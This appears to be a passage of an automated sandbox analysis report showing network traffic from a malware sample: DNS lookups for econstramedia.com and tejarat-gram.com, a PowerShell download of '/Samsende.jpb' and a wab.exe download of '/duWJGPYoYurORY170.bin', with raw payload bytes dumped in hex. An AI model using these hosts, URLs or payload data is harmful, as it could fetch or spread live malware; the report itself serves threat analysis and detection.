                    Jul 15, 2024 17:37:56.497670889 CEST44349737185.83.114.124192.168.2.4
                    Jul 15, 2024 17:37:56.497685909 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.497715950 CEST49737443192.168.2.4185.83.114.124
                    Jul 15, 2024 17:37:56.497730970 CEST49737443192.168.2.4185.83.114.124
                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                    Jul 15, 2024 17:37:01.166383982 CEST | 58861 | 53 | 192.168.2.4 | 1.1.1.1
                    Jul 15, 2024 17:37:01.448771954 CEST | 53 | 58861 | 1.1.1.1 | 192.168.2.4
                    Jul 15, 2024 17:37:45.317444086 CEST | 63160 | 53 | 192.168.2.4 | 1.1.1.1
                    Jul 15, 2024 17:37:45.410852909 CEST | 53 | 63160 | 1.1.1.1 | 192.168.2.4
                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                    Jul 15, 2024 17:37:01.166383982 CEST | 192.168.2.4 | 1.1.1.1 | 0xde13 | Standard query (0) | econstramedia.com | A (IP address) | IN (0x0001) | false
                    Jul 15, 2024 17:37:45.317444086 CEST | 192.168.2.4 | 1.1.1.1 | 0xb808 | Standard query (0) | tejarat-gram.com | A (IP address) | IN (0x0001) | false
                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                    Jul 15, 2024 17:37:01.448771954 CEST | 1.1.1.1 | 192.168.2.4 | 0xde13 | No error (0) | econstramedia.com | | 103.211.216.55 | A (IP address) | IN (0x0001) | false
                    Jul 15, 2024 17:37:45.410852909 CEST | 1.1.1.1 | 192.168.2.4 | 0xb808 | No error (0) | tejarat-gram.com | | 185.83.114.124 | A (IP address) | IN (0x0001) | false
                    • econstramedia.com
                    • tejarat-gram.com
                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    0 | 192.168.2.4 | 49730 | 103.211.216.55 | 443 | 6716 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2024-07-15 15:37:02 UTC | 173 | OUT | GET /Samsende.jpb HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                    Host: econstramedia.com
                    Connection: Keep-Alive
                    2024-07-15 15:37:03 UTC | 209 | IN | HTTP/1.1 200 OK
                    Date: Mon, 15 Jul 2024 15:37:02 GMT
                    Server: Apache
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Last-Modified: Thu, 11 Jul 2024 11:48:44 GMT
                    Accept-Ranges: bytes
                    Content-Length: 483164
                    2024-07-15 15:37:03 UTC7983INData Raw: 63 51 47 62 36 77 4a 71 72 62 73 44 6f 42 6b 41 36 77 4a 32 61 33 45 42 6d 77 4e 63 4a 41 52 78 41 5a 76 72 41 6e 45 49 75 55 6f 57 77 33 52 78 41 5a 74 78 41 5a 75 42 38 52 72 51 30 64 62 72 41 72 37 58 63 51 47 62 67 65 6c 51 78 68 4b 69 36 77 4c 52 7a 48 45 42 6d 2b 73 43 72 64 46 78 41 5a 75 36 77 70 70 33 71 65 73 43 43 33 62 72 41 6a 48 51 36 77 4b 66 2b 58 45 42 6d 7a 48 4b 63 51 47 62 63 51 47 62 69 52 51 4c 36 77 4a 50 48 6e 45 42 6d 39 48 69 63 51 47 62 63 51 47 62 67 38 45 45 63 51 47 62 63 51 47 62 67 66 6d 39 67 6c 51 46 66 4d 35 78 41 5a 76 72 41 68 67 69 69 30 51 6b 42 48 45 42 6d 2b 73 43 50 67 53 4a 77 2b 73 43 35 46 4e 78 41 5a 75 42 77 35 53 62 4a 41 56 78 41 5a 76 72 41 6d 41 68 75 73 56 48 4c 56 42 78 41 5a 74 78 41 5a 75 42 38 6c 70
                    Data Ascii: cQGb6wJqrbsDoBkA6wJ2a3EBmwNcJARxAZvrAnEIuUoWw3RxAZtxAZuB8RrQ0dbrAr7XcQGbgelQxhKi6wLRzHEBm+sCrdFxAZu6wpp3qesCC3brAjHQ6wKf+XEBmzHKcQGbcQGbiRQL6wJPHnEBm9HicQGbcQGbg8EEcQGbcQGbgfm9glQFfM5xAZvrAhgii0QkBHEBm+sCPgSJw+sC5FNxAZuBw5SbJAVxAZvrAmAhusVHLVBxAZtxAZuB8lp
                    2024-07-15 15:37:03 UTC8000INData Raw: 78 50 70 63 37 51 4c 63 41 2f 6b 75 65 41 33 4f 61 42 74 49 55 57 48 4c 61 34 6c 7a 4b 41 38 4a 38 6f 44 47 38 6a 7a 71 4c 79 48 62 71 41 2f 49 39 59 75 56 6a 68 38 49 46 4e 6d 6e 39 54 31 70 54 58 30 62 74 36 2b 4d 6c 73 53 30 45 4d 36 67 62 31 66 30 41 79 4d 70 2f 4f 6e 64 77 57 69 6f 6b 67 6e 59 75 32 4f 7a 32 32 79 35 41 47 35 32 65 45 43 2f 5a 67 56 4c 63 79 37 75 41 67 7a 51 4f 6d 6a 78 33 70 44 34 33 74 65 43 31 41 75 77 66 54 58 53 6d 51 2f 4f 43 74 66 68 44 42 59 56 7a 54 55 51 64 45 36 65 6b 5a 35 4a 46 59 54 30 39 55 65 51 4e 30 4c 75 57 45 6e 4d 55 46 65 32 65 2b 4a 79 6f 6f 58 6b 58 48 52 77 44 53 43 31 55 74 47 53 6e 76 55 4d 47 6f 53 6d 79 50 73 76 50 41 74 38 4c 70 4d 33 4c 32 34 64 76 76 71 72 2f 47 38 73 78 6a 57 59 71 50 78 6b 32 42 75
                    Data Ascii: xPpc7QLcA/kueA3OaBtIUWHLa4lzKA8J8oDG8jzqLyHbqA/I9YuVjh8IFNmn9T1pTX0bt6+MlsS0EM6gb1f0AyMp/OndwWiokgnYu2Oz22y5AG52eEC/ZgVLcy7uAgzQOmjx3pD43teC1AuwfTXSmQ/OCtfhDBYVzTUQdE6ekZ5JFYT09UeQN0LuWEnMUFe2e+JyooXkXHRwDSC1UtGSnvUMGoSmyPsvPAt8LpM3L24dvvqr/G8sxjWYqPxk2Bu
                    2024-07-15 15:37:03 UTC8000INData Raw: 30 54 6c 76 72 49 36 4d 49 53 4e 46 46 6b 67 53 71 6c 6f 30 47 52 7a 39 62 36 64 70 39 4e 6f 36 6a 39 4a 67 6f 6c 47 6e 66 65 42 4a 57 73 71 34 75 72 79 66 69 6b 4c 4b 53 36 4b 58 4b 59 71 36 2f 6c 41 6d 68 36 63 32 43 4e 41 48 4e 64 66 73 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 52 31 4d 65 73 70 30 49 64 37 45 4f 51 43 6a 63 38 32 47 57 32 32 49 36 33 4f 2f 34 64 5a 48 6a 55 4f 7a 41 76 75 57 48 4c 30 30 6b 64 73 41 39 70 2b 43 63 38 33 6a 7a 72 71 43 32 4b 30 41 2f 49 74 73 63 6f 53 6a 7a 71 30 2f 64 62 47 43 7a 4b 6c 50 63 56 62 4e 43 38 34 46 36 2b 72 42 7a 47 76 66 52 33 6e 64 57 59 41 4d 42 5a 34 4a 55 42 4e 47 2b 68 53 79 75 59 6f 61 6c 78 48 46 36 67 50 7a 49 4c 4c 33 70 52 4f 72 76 77 4d 59 72
                    Data Ascii: 0TlvrI6MISNFFkgSqlo0GRz9b6dp9No6j9JgolGnfeBJWsq4uryfikLKS6KXKYq6/lAmh6c2CNAHNdfsOzII0DsyCNA7MgjQOzII0DsyCNA7MgjR1Mesp0Id7EOQCjc82GW22I63O/4dZHjUOzAvuWHL00kdsA9p+Cc83jzrqC2K0A/ItscoSjzq0/dbGCzKlPcVbNC84F6+rBzGvfR3ndWYAMBZ4JUBNG+hSyuYoalxHF6gPzILL3pROrvwMYr
                    2024-07-15 15:37:03 UTC8000INData Raw: 4c 6a 2b 53 4b 54 4b 4f 4d 44 32 59 65 45 7a 79 59 69 7a 38 6b 6d 6d 45 58 41 75 6d 73 4b 52 4e 33 48 49 35 4b 39 50 44 43 52 37 4c 55 56 4f 55 32 46 36 63 70 62 37 73 6d 31 6f 41 74 32 72 39 37 37 4e 53 4b 73 4e 55 69 66 49 38 36 34 6b 39 73 77 67 50 43 5a 66 52 75 2f 6f 38 69 6e 6f 67 6a 51 41 73 71 50 4a 65 33 54 5a 4e 4e 68 57 39 57 50 74 4c 61 77 75 59 47 6c 55 72 4b 56 50 77 70 4b 67 7a 53 34 31 44 70 50 64 74 64 33 4c 58 49 7a 4a 49 31 44 67 44 54 46 6b 50 4b 6a 64 53 52 69 41 74 73 49 76 55 43 4d 6b 41 4d 30 67 36 69 36 67 4d 78 32 5a 56 4c 43 4b 4b 69 66 4c 78 78 32 4f 6a 45 43 32 6e 71 54 59 47 77 35 47 4f 78 44 69 74 6b 6d 6b 31 31 77 70 50 54 65 4c 58 35 32 78 2b 56 4c 55 31 31 57 4e 77 69 7a 37 30 78 58 65 52 4f 69 4a 77 62 2b 4d 48 71 74 36
                    Data Ascii: Lj+SKTKOMD2YeEzyYiz8kmmEXAumsKRN3HI5K9PDCR7LUVOU2F6cpb7sm1oAt2r977NSKsNUifI864k9swgPCZfRu/o8inogjQAsqPJe3TZNNhW9WPtLawuYGlUrKVPwpKgzS41DpPdtd3LXIzJI1DgDTFkPKjdSRiAtsIvUCMkAM0g6i6gMx2ZVLCKKifLxx2OjEC2nqTYGw5GOxDitkmk11wpPTeLX52x+VLU11WNwiz70xXeROiJwb+MHqt6
                    2024-07-15 15:37:03 UTC8000INData Raw: 38 5a 57 69 71 70 31 37 70 6e 53 2f 4f 42 76 52 55 39 47 52 76 41 63 31 77 4a 51 37 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 48 46 6a 4e 72 35 33 63 4a 6f 64 75 32 36 7a 61 30 47 34 69 61 2b 69 45 64 35 47 56 76 77 37 31 65 61 71 41 7a 41 4f 51 77 65 6f 44 73 79 43 55 67 45 4c 73 44 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6c 6e 4c 46 66 4e 30 67 77 70 38 35 30 46 48 7a 32 69 30 52 2f 2b 33 7a 77 42 30 49 35 48 4f 4a 56 37 31 4a 32 43 49 54 52 36 2f 4b 4c 5a 75 42 58 54 39 77 4d 37 73 52 66 34 42 2b 66 4b 59 37 75 33 6d 4d 76 41 77 44 70 34 34 77 4c 33 69 50 4c 58 38 69 4c 64 6f 6e 55 31 41 66 72 4b 4f 69 72 58 38 44 58 78 4d 75 6b 31 41 62 61 44 2b 2f 4c
                    Data Ascii: 8ZWiqp17pnS/OBvRU9GRvAc1wJQ7MgjQOzII0DsyCNA7MgjQOzII0DsyCNHFjNr53cJodu26za0G4ia+iEd5GVvw71eaqAzAOQweoDsyCUgELsDQOzII0DsyCNA7MgjQOzII0DsyCNA7MglnLFfN0gwp850FHz2i0R/+3zwB0I5HOJV71J2CITR6/KLZuBXT9wM7sRf4B+fKY7u3mMvAwDp44wL3iPLX8iLdonU1AfrKOirX8DXxMuk1AbaD+/L
                    2024-07-15 15:37:03 UTC8000INData Raw: 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 51 4f 7a 49 49 30 44 73 7a 39 41 47 75 46 4c 36 71 52 33 65 6a 4c 36 74 36 2f 67 49 63 4a 4c 5a 78 46 6f 4d 45 7a 47 51 6f 44 39 78 36 6b 64 32 61 50 4a 38 4e 4d 5a 4e 2f 52 4f 77 2f 2f 31 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6c 49 55 53 6c 70 76 52 59 50 66 35 4a 45 39 63 38 33 4d 6f 51 6e 65 68 56 47 74 4e 67 37 4d 30 34 30 70 79 6f 52 49 6a 7a 30 77 72 58 47 6e 41 38 55 7a 66 50 73 6a 68 38 58 50 5a 73 2b 77 73 78 4f 6b 5a 78 61 78 32 58 68 45 72 4e 4a 57 49 48 43 31 4f 6c 54 63 72 52 30 39 72 6e 48 2b 49 71 72 77 41 6b 42 67 43 32 30 65 72 32 41 69 4c 47 4c 46 48 57 6e 49 6f 37 6e 63 31 31 65 64 4f 34 36 4c 52 66 57 31 2f 37 54 53 51 63 31 4e 51 31
                    Data Ascii: OzII0DsyCNA7MgjQOzII0Dsz9AGuFL6qR3ejL6t6/gIcJLZxFoMEzGQoD9x6kd2aPJ8NMZN/ROw//1jQOzII0DsyCNA7MgjQOzII0DsyCNA7MglIUSlpvRYPf5JE9c83MoQnehVGtNg7M040pyoRIjz0wrXGnA8UzfPsjh8XPZs+wsxOkZxax2XhErNJWIHC1OlTcrR09rnH+IqrwAkBgC20er2AiLGLFHWnIo7nc11edO46LRfW1/7TSQc1NQ1
                    2024-07-15 15:37:03 UTC8000INData Raw: 69 32 74 57 4c 6d 54 70 54 4e 6f 30 7a 6a 6a 75 4b 57 2f 6b 77 44 70 50 5a 44 50 71 55 30 37 2b 44 4e 49 4d 30 44 73 4e 46 43 76 2f 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 36 31 4d 38 39 51 75 6b 66 32 72 4b 50 48 4b 2f 37 30 30 41 59 52 63 6f 64 76 66 2f 6d 45 2b 4c 63 64 43 64 50 72 44 63 59 50 4f 44 45 63 74 66 54 67 75 41 62 7a 6d 6c 2f 55 35 30 45 67 41 61 58 46 68 47 42 6a 38 6d 70 53 34 73 79 43 4f 77 38 2f 62 44 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6a 51 4f 7a 49 49 30 44 73 79 43 4e 41 37 4d 67 6b 77 6a 4a 6b 66 39 78 39 61 32 73 4c 77 63 75 52 49 71 41 71 62 2f 4f 56 6a 6e 67 45 45 51 43 34 6d 56 7a 59 49 30 73 53 47 31 6b 4c 69 63 4f 74 63 66 2b 4b 45 42 43 4f 46 7a 6a 54 74 48 42 6c
                    Data Ascii: i2tWLmTpTNo0zjjuKW/kwDpPZDPqU07+DNIM0DsNFCv/MgjQOzII0DsyCNA7MgjQOzII0DsyCNA61M89Qukf2rKPHK/700AYRcodvf/mE+LcdCdPrDcYPODEctfTguAbzml/U50EgAaXFhGBj8mpS4syCOw8/bDQOzII0DsyCNA7MgjQOzII0DsyCNA7MgkwjJkf9x9a2sLwcuRIqAqb/OVjngEEQC4mVzYI0sSG1kLicOtcf+KEBCOFzjTtHBl
                    2024-07-15 15:37:03 UTC8000INData Raw: 4e 73 66 59 31 41 55 6c 2f 49 77 37 4d 31 59 75 38 50 72 77 75 6a 77 74 35 53 63 33 6f 41 2f 4e 64 58 48 2f 30 58 6c 41 4c 31 41 66 30 48 37 44 50 74 5a 4c 67 72 55 66 42 54 61 70 6f 58 72 4e 5a 4b 4a 35 61 34 35 38 63 36 73 57 54 44 71 2f 30 6e 4d 72 71 51 61 63 4e 52 6d 47 71 75 2f 39 57 71 67 66 2f 55 54 4d 33 6f 41 37 4d 67 73 74 37 70 47 72 4f 66 73 79 43 76 59 4f 78 67 7a 51 4f 6e 44 6f 6b 55 70 30 34 47 59 48 6a 37 66 49 37 46 6a 6e 57 2f 55 57 4b 34 6f 39 68 62 73 75 58 52 50 76 6d 75 2b 4d 36 4d 53 30 33 75 70 6c 37 7a 4d 73 6a 7a 57 7a 6e 61 72 75 6b 43 6a 4e 53 67 75 63 4c 56 6e 57 53 61 33 35 44 30 6f 77 70 50 52 35 46 4f 38 30 4a 53 50 50 35 32 66 66 4e 70 36 38 4e 36 4f 35 6c 76 52 36 38 70 6a 36 76 42 61 64 79 56 61 59 69 7a 49 70 43 37 30
                    Data Ascii: NsfY1AUl/Iw7M1Yu8Prwujwt5Sc3oA/NdXH/0XlAL1Af0H7DPtZLgrUfBTapoXrNZKJ5a458c6sWTDq/0nMrqQacNRmGqu/9Wqgf/UTM3oA7Mgst7pGrOfsyCvYOxgzQOnDokUp04GYHj7fI7FjnW/UWK4o9hbsuXRPvmu+M6MS03upl7zMsjzWznarukCjNSgucLVnWSa35D0owpPR5FO80JSPP52ffNp68N6O5lvR68pj6vBadyVaYizIpC70
                    2024-07-15 15:37:03 UTC8000INData Raw: 48 68 4f 37 43 6f 37 47 74 70 2f 43 56 6c 5a 56 38 6d 56 79 35 63 74 50 42 4d 58 32 71 69 46 43 50 2b 4b 5a 49 4e 77 4d 51 74 53 4c 6f 61 44 2f 55 72 33 32 42 6e 73 79 43 4e 4f 5a 62 7a 6a 41 4f 4a 46 64 67 44 73 7a 53 6a 4b 31 41 66 37 41 4c 5a 37 6b 79 45 50 6c 69 48 6d 39 66 74 35 72 74 72 72 4a 6c 6b 6b 56 6a 50 51 39 52 75 76 5a 33 36 67 76 4e 64 54 67 66 6e 44 48 56 53 73 73 4d 52 79 4e 71 45 6e 58 6b 78 51 41 49 68 78 52 75 78 57 45 49 61 38 77 54 2b 30 74 68 48 55 74 44 47 48 69 34 62 68 4f 39 36 76 43 42 30 49 34 6c 4c 71 73 30 6a 54 61 69 4f 34 72 37 7a 6a 41 4f 6c 74 74 53 4e 77 33 61 59 37 45 59 77 52 70 4f 54 55 58 38 4d 4c 43 62 74 66 6c 54 6e 54 6e 42 54 55 55 76 66 35 54 72 76 51 46 4f 63 76 70 5a 6e 77 47 34 45 58 4e 38 43 34 41 52 6e 52
                    Data Ascii: HhO7Co7Gtp/CVlZV8mVy5ctPBMX2qiFCP+KZINwMQtSLoaD/Ur32BnsyCNOZbzjAOJFdgDszSjK1Af7ALZ7kyEPliHm9ft5rtrrJlkkVjPQ9RuvZ36gvNdTgfnDHVSssMRyNqEnXkxQAIhxRuxWEIa8wT+0thHUtDGHi4bhO96vCB0I4lLqs0jTaiO4r7zjAOlttSNw3aY7EYwRpOTUX8MLCbtflTnTnBTUUvf5TrvQFOcvpZnwG4EXN8C4ARnR
                    2024-07-15 15:37:03 UTC8000INData Raw: 4d 4a 35 53 31 75 31 53 44 4e 41 37 30 2f 56 53 46 53 46 73 4d 38 4b 6f 48 39 55 30 7a 44 36 77 50 7a 49 4a 42 2b 6b 68 74 64 38 6e 50 4c 35 6c 34 70 32 6c 34 4b 4d 2f 62 58 72 37 5a 71 64 50 31 32 41 6c 39 65 49 4c 74 6f 2b 6a 56 31 55 47 64 75 48 79 54 41 50 41 70 65 6e 6b 59 70 70 63 76 47 55 43 34 2b 42 4b 6b 4e 31 65 6d 4d 69 45 6c 4b 33 6b 67 68 59 58 30 65 6d 46 62 5a 43 31 5a 75 52 46 41 38 47 75 4d 43 4b 57 43 39 65 41 71 62 36 50 68 7a 45 42 30 36 6f 2f 50 55 6f 58 78 55 51 62 52 6a 2f 39 57 4b 54 66 39 41 77 66 4e 5a 35 33 55 6a 6a 4f 56 38 34 75 59 67 44 51 4f 4d 63 38 46 4d 6b 30 33 59 41 7a 4d 67 6d 5a 4e 77 39 6b 4d 2b 30 30 76 59 41 7a 4d 67 70 32 4d 35 72 53 31 75 35 69 41 4e 41 37 4a 44 69 63 2f 53 56 6f 4d 34 76 56 52 64 2f 46 42 31 6a
                    Data Ascii: MJ5S1u1SDNA70/VSFSFsM8KoH9U0zD6wPzIJB+khtd8nPL5l4p2l4KM/bXr7ZqdP12Al9eILto+jV1UGduHyTAPApenkYppcvGUC4+BKkN1emMiElK3kghYX0emFbZC1ZuRFA8GuMCKWC9eAqb6PhzEB06o/PUoXxUQbRj/9WKTf9AwfNZ53UjjOV84uYgDQOMc8FMk03YAzMgmZNw9kM+00vYAzMgp2M5rS1u5iANA7JDic/SVoM4vVRd/FB1j


                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                    1 | 192.168.2.4 | 49737 | 185.83.114.124 | 443 | 6020 | C:\Program Files (x86)\Windows Mail\wab.exe
                    Timestamp | Bytes transferred | Direction | Data
                    2024-07-15 15:37:55 UTC | 182 | OUT | GET /duWJGPYoYurORY170.bin HTTP/1.1
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                    Host: tejarat-gram.com
                    Cache-Control: no-cache
                    2024-07-15 15:37:55 UTC | 241 | IN | HTTP/1.1 200 OK
                    Date: Mon, 15 Jul 2024 15:37:55 GMT
                    Server: Apache
                    Last-Modified: Thu, 11 Jul 2024 11:46:43 GMT
                    Accept-Ranges: bytes
                    Content-Length: 271424
                    Vary: User-Agent
                    Connection: close
                    Content-Type: application/octet-stream
                    2024-07-15 15:37:55 UTC7951INData Raw: 1e 20 76 ab fe 6d 3c d9 96 d8 3b 0c 34 ed 7e 70 8b 3e 3a ca 23 61 05 be f0 b9 92 8c f2 61 46 4e d9 6d 1a 49 3d fa 75 5e 35 79 4d ee 65 5e ad 61 57 e8 82 44 34 d1 30 f7 20 71 86 7f 0e 88 c6 7f 7b 8c 91 00 9b 5a eb 23 44 a4 e7 c9 15 0a 6b 01 3b 3b e7 05 ea 4b 19 28 c9 b3 b0 b8 cf da 05 d9 49 01 71 d2 6c 27 85 67 d2 44 05 23 fc db a6 20 2d 2e 06 e5 63 74 38 c3 95 7e 81 6c 82 7d 6d f2 59 70 16 b6 21 a4 b1 ee c3 fb 0a c9 4f 89 28 e1 d2 43 06 a0 4a de 81 29 b2 5c 5c 9e e4 cd f6 26 84 fe 8f 3c 5c 5f 00 e6 b4 d4 2b 54 ca 56 3c b0 bd 17 59 52 6e ba ba e9 03 1d a2 5d c5 c6 14 47 d9 3d 55 d8 f8 a1 9e dc ae fb ca 28 aa ac 48 aa 32 db a7 35 51 de ea e2 00 c8 68 d0 a0 6e d7 85 2f 07 ae 58 7b 5a b5 db d8 9a 21 bc 67 c5 f8 9c 1e 84 4d 0b 7f b1 6f e3 e4 79 0d 36 24 d4 37
                    Data Ascii: vm<;4~p>:#aaFNmI=u^5yMe^aWD40 q{Z#Dk;;K(Iql'gD# -.ct8~l}mYp!O(CJ)\\&<\_+TV<YRn]G=U(H25Qhn/X{Z!gMoy6$7
                    2024-07-15 15:37:55 UTC8000INData Raw: 32 51 0b 81 aa 29 fa 8b c1 a8 a1 9b 34 97 4d 9b d4 8e 37 11 1b e2 1b 80 78 ae 4c 88 73 a4 9e af 86 11 b5 ca 34 aa 8f 6b 7a 0a 10 94 a3 d6 45 74 5d 8e 58 6c 38 ad b8 bb d6 c5 2e 12 e5 7b 64 84 9d c2 19 35 5e e3 60 04 8d 14 22 3a ae e1 d8 ea 97 3e 39 02 00 ab b8 a7 c2 f9 e6 17 1c 54 5f 05 05 e3 c1 85 4e 06 03 45 e1 8b 41 b8 81 6f 50 b2 6d d1 e2 38 cf 05 47 06 96 f0 9a b1 1d 80 6a 29 1a f4 d9 cd dc 0b b1 82 f9 ec d8 6b ce 3a e2 19 91 01 00 78 84 83 ee cd 5a 78 59 a6 72 fb 75 77 6a 04 35 2f cd 20 e2 0b 78 fd 1b f1 5a 64 76 2d 77 83 b8 93 51 7f ee e8 81 af 4f 9f 4b fd 59 1b 73 19 53 1a ca 1f 5c d6 f7 50 59 09 39 c6 84 1a ea 48 11 23 6c b4 78 6c e6 3f 06 5a 8a 03 f0 29 58 37 85 67 ae 9f 8f 6e 03 e8 66 ad b6 2e 06 e5 63 4e b4 c4 fd 7c 81 6c 4e 7a 2d c9 91 19 5e
                    Data Ascii: 2Q)4M7xLs4kzEt]Xl8.{d5^`":>9T_NEAoPm8Gj)k:xZxYruwj5/ xZdv-wQOKYsS\PY9H#lxl?Z)X7gnf.cN|lNz-^
                    2024-07-15 15:37:55 UTC8000INData Raw: de 86 c9 3f 64 0c f2 22 d0 c0 f0 50 bc 28 2f 1c d0 c2 3a d1 b9 6e 68 ed 60 46 56 a7 e3 64 cb ca 6e 00 5b 09 d8 e2 1e 83 8a 3a 06 43 23 f9 29 75 c4 df 02 e3 ac 7d 27 e5 d7 2a 3b 78 0b 6f 10 3b cd ff 97 57 eb 38 97 93 e1 58 05 81 ee ed ad 8b ad 1a a4 42 f4 72 76 d2 f6 d3 05 70 bc 9b a2 55 39 a5 8c 7b 36 3a 12 3e 74 66 16 9d 79 28 a3 18 42 cb 37 a4 ac f0 12 cc 75 4e a3 1b f1 6a 16 b6 05 f2 66 7f 0a 17 77 de a0 ee c6 52 98 30 6a 9b 1b c8 44 d2 ab fe 7b 59 d7 97 b5 50 c5 fd b9 5e dc dc 34 e9 d3 ed 01 58 94 ca 31 88 3d 5c 37 b2 b4 87 ca 41 e4 1e 20 12 63 55 bd a6 35 af bd d0 3d 4b 6e 8b ab 81 0f ff 32 89 b3 03 41 c7 5d 10 a3 0d 02 8e a8 26 1b ce 80 f7 5a 02 b0 ea 4a 9b 4b 20 32 03 f6 6f cd 9e 6d 24 97 cc a7 3f 06 68 a7 ef cc 89 43 02 d5 15 3b c2 3f 84 bb 68 cd
                    Data Ascii: ?d"P(/:nh`FVdn[:C#)u}'*;xo;W8XBrvpU9{6:>tfy(B7uNjfwR0jD{YP^4X1=\7A cU5=Kn2A]&ZJK 2om$?hC;?h
                    2024-07-15 15:37:55 UTC8000INData Raw: 3c 72 50 49 4c 88 e7 b9 3f 20 69 9f d7 ca 0f 5b f4 08 13 2d 7b e6 70 2b 21 a8 f4 1c 7f d1 d0 47 7b 75 9e 14 02 b6 2d b0 35 bc 88 d4 d6 a5 f3 7c 02 48 cd cf 76 11 3c db ea 7b 02 f4 6e d4 f0 13 32 7d 45 50 99 8a 12 45 92 df b9 05 18 13 ed 7c 28 7f 10 1a e5 d8 19 3a ff a9 c8 2c 17 86 a4 fe 56 5d b2 d4 17 64 21 2d 91 1d 56 52 23 56 39 91 64 26 92 26 3d 2c 8c 94 56 8c 8d 47 29 ef ae b8 d2 5b a5 fb bf 48 59 e9 41 c6 43 a3 fb 85 00 e7 0a e1 85 37 5f 62 34 be 59 65 ac 86 b6 8c 52 80 28 62 2c 0e 73 4e 17 62 e1 85 e8 c7 a4 5d de f8 d1 8d cc a2 2b b5 c8 00 91 75 1b 1c 1c 8b b7 02 5f b6 47 58 42 5a 6e a4 92 31 5d 3e 71 79 14 0c 2b 97 3e 9c ab 5b 5a c6 ff 27 a7 66 59 be b4 1d 60 36 46 0f 93 f9 71 af 7a 0b 88 72 53 cf 15 dd c3 7a fa f1 c9 1a 9d a0 40 d8 a2 f1 26 d0 d2
                    Data Ascii: <rPIL? i[-{p+!G{u-5|Hv<{n2}EPE|(:,V]d!-VR#V9d&&=,VG)[HYAC7_b4YeR(b,sNb]+u_GXBZn1]>qy+>[Z'fY`6FqzrSz@&
                    2024-07-15 15:37:56 UTC8000INData Raw: 56 4a d3 fd 20 58 f2 5a 3b bd c1 88 7a 2a 99 de 50 14 b0 14 86 2f 24 52 6d 74 51 4f f8 ef 71 40 80 2a b9 20 0c b1 03 6d be 59 db 5d 26 f1 d5 8a 9d fc 26 1c 1b d1 25 39 5c 07 33 bf 52 0e 39 26 6f 32 91 7d d8 e6 7c 17 4a 99 1e 35 a6 b2 14 ff b5 0b 3f 4d 0e 8d 0f 59 a8 29 77 d2 8f b7 04 dd 41 ea c2 ed 0d d6 f4 a5 ee 74 d6 09 5e cb 57 8f e1 81 f1 9c fa 0e d8 54 72 f4 ba b6 25 fe 19 91 b6 d5 d7 f3 25 fa ae 5a df 7c 64 44 3c 6f 19 f1 ae 34 b2 04 0b 2c 96 16 c9 9d 84 5e 56 79 ef d6 98 69 a0 d8 27 a2 b6 f8 49 93 16 5d ae 4a a3 b7 e1 7d f3 15 05 d4 72 e4 d0 95 d3 0f 61 86 b7 a5 46 1e fe 92 b5 51 da c3 e7 32 0c 90 2a a7 6c 5c f8 ba 7e 3c cf da 9e c2 0a c0 b3 7e 56 c1 ea 06 04 85 86 f9 ef fd ba 93 78 cf 54 08 67 e4 89 b9 35 68 3d 5d a1 fe 6b 1d db 31 93 bf f9 de e8
                    Data Ascii: VJ XZ;z*P/$RmtQOq@* mY]&&%9\3R9&o2}|J5?MY)wAt^WTr%%Z|dD<o4,^Vyi'I]J}raFQ2*l\~<~VxTg5h=]k1
                    2024-07-15 15:37:56 UTC8000INData Raw: 50 eb cf 4b 27 8e 05 b3 a1 7e c7 02 66 d2 c5 5f 00 0a ea 9c 0c b4 12 0b f1 ce 2e f4 23 54 b0 42 2c 73 f9 55 07 68 89 7b 59 77 f3 79 84 f1 1d 2b 8a 99 df 97 56 11 7f 2f 53 14 c1 65 09 30 4c a0 a6 7e b7 dc 4d 64 85 23 01 14 54 10 05 a6 ae dc 69 43 42 28 73 45 b8 d8 b1 31 07 3f a1 96 16 e2 f2 71 13 8b 36 f7 34 f7 3c 86 0a 7e e4 0e c1 ed 89 70 45 5a 8a c8 19 90 f4 7b 8b 91 f5 4a 54 42 4f 3f 36 37 bb c5 fa 18 62 39 60 21 b7 72 63 b8 8b 7d ff 9c 94 7f c2 31 3b 27 2e 60 d9 f4 87 c6 2b 7d 6d 3b 14 68 3d 38 43 33 1b c6 2f a6 49 51 3c 0c 70 c9 64 7d 1f 61 38 ad af 00 02 27 03 a1 d5 12 4d 16 5c c0 e9 f9 8d a7 19 d0 5a a8 72 80 71 21 8c 23 8d 30 8f e8 fa 2b 46 5a e0 f6 9f b0 ad a9 5a 28 60 e5 fb 92 c2 cd f9 c7 92 18 6e e5 f3 49 86 10 9c 14 37 bd 59 d0 6f 2e 53 bb b3
                    Data Ascii: PK'~f_.#TB,sUh{Ywy+V/Se0L~Md#TiCB(sE1?q64<~pEZ{JTBO?67b9`!rc}1;'.`+}m;h=8C3/IQ<pd}a8'M\Zrq!#0+FZZ(`nI7Yo.S
